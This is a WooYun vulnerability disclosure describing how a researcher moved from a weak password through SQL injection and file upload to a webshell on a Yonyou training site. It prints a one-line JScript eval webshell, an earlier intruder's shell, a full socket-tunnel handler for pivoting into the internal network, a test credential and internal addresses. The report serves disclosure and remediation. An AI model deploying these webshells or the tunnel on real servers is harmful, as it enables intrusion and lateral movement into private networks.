当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207265

漏洞标题:从一个弱口令到Getshell用友某站点(可深入内网&已发现入侵者痕迹)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2016-05-11 09:35

修复时间:2016-06-26 13:30

公开时间:2016-06-26 13:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开

简要描述:

从一个弱口令到getshell用友某站点(已发现入侵者痕迹)

详细说明:

1.某站点未设置验证码:
简单测试后拿到一个账号:
http://lexue.yonyou.com
test1/123456

2.png


2.发现某处SQL注入
登录后对站点进行简单测试,发现存在一处报错注入:

3.png


不深入测试,估计还存在注入,请自查!

漏洞证明:

3.个人资料头像处存在文件任意上传

4.png


经过测试后发现,上传正常的菜刀马会出现错误报错,无法正常解析aspx。

<head runat="server" />
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["1"],"unsafe"));%>


上传后,通过抓包可得到完整上传路径:

5.png


发现该服务器与内网相通:

[*] 基本信息 [ A:C:D:L: ]
D:\PX20150204\Website\Upload\PXSystem\default\> whoami
nt authority\network service
D:\PX20150204\Website\UpLoad\PXSystem\default\> nslookup yonyou.com
鏈嶅姟鍣? bg-dc-01.ufsoft.com.cn
Address: 192.168.8.119
鍚嶇О: yonyou.com.com.cn
Address: 202.106.199.34


4.发现入侵痕迹:
同目录下发现文件:20151002173504600358.aspx

<%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%><head runat="server">f</head>


可确定入侵时间点为:去年10月2号。
发现提权神器:

6.png


通过查找目录,发现
D:\PX20150204\Website\Upload\Log\tunnel.ashx

<%@ WebHandler Language="C#" Class="GenericHandler1" %>
using System;
using System.Web;
using System.Net;
using System.Net.Sockets;
public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState
{

public void ProcessRequest (HttpContext context) {
try
{
if (context.Request.HttpMethod == "POST")
{
String cmd = context.Request.QueryString.Get("cmd").ToUpper();
if (cmd == "CONNECT")
{
try
{
String target = context.Request.QueryString.Get("target").ToUpper();
int port = int.Parse(context.Request.QueryString.Get("port"));
IPAddress ip = IPAddress.Parse(target);
System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

sender.Connect(remoteEP);
sender.Blocking = false;
context.Session["socket"] = sender;
context.Response.AddHeader("X-STATUS", "OK");
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
else if (cmd == "DISCONNECT")
{
try
{
Socket s = (Socket)context.Session["socket"];
s.Close();
}
catch (Exception ex)
{
}
context.Session.Abandon();
context.Response.AddHeader("X-STATUS", "OK");
}
else if (cmd == "FORWARD")
{
Socket s = (Socket)context.Session["socket"];
try
{
int buffLen = context.Request.ContentLength;
byte[] buff = new byte[buffLen];
int c = 0;
while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)
{
s.Send(buff);
}
context.Response.AddHeader("X-STATUS", "OK");
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
else if (cmd == "READ")
{
Socket s = (Socket)context.Session["socket"];
try
{
int c = 0;
byte[] readBuff = new byte[512];
try
{
while ((c = s.Receive(readBuff)) > 0)
{
byte[] newBuff = new byte[c];
Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);
context.Response.BinaryWrite(newBuff);
}
context.Response.AddHeader("X-STATUS", "OK");
}
catch (SocketException soex)
{
context.Response.AddHeader("X-STATUS", "OK");
return;
}
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
} else {
context.Response.Write("Georg says, 'All seems fine'");
}
}
catch (Exception exKak)
{
context.Response.AddHeader("X-ERROR", exKak.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}

public bool IsReusable {
get {
return false;
}
}
}


根据时间点分析:该文件创建于去年10月27日,可能该入侵者,上传文件并隐藏于log目录下,进行内网反弹,可深入进行内网渗透。
由于未得到厂商允许,未进行深入渗透!

修复方案:

请自查!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-12 13:20

厂商回复:

非常感谢

最新状态:

暂无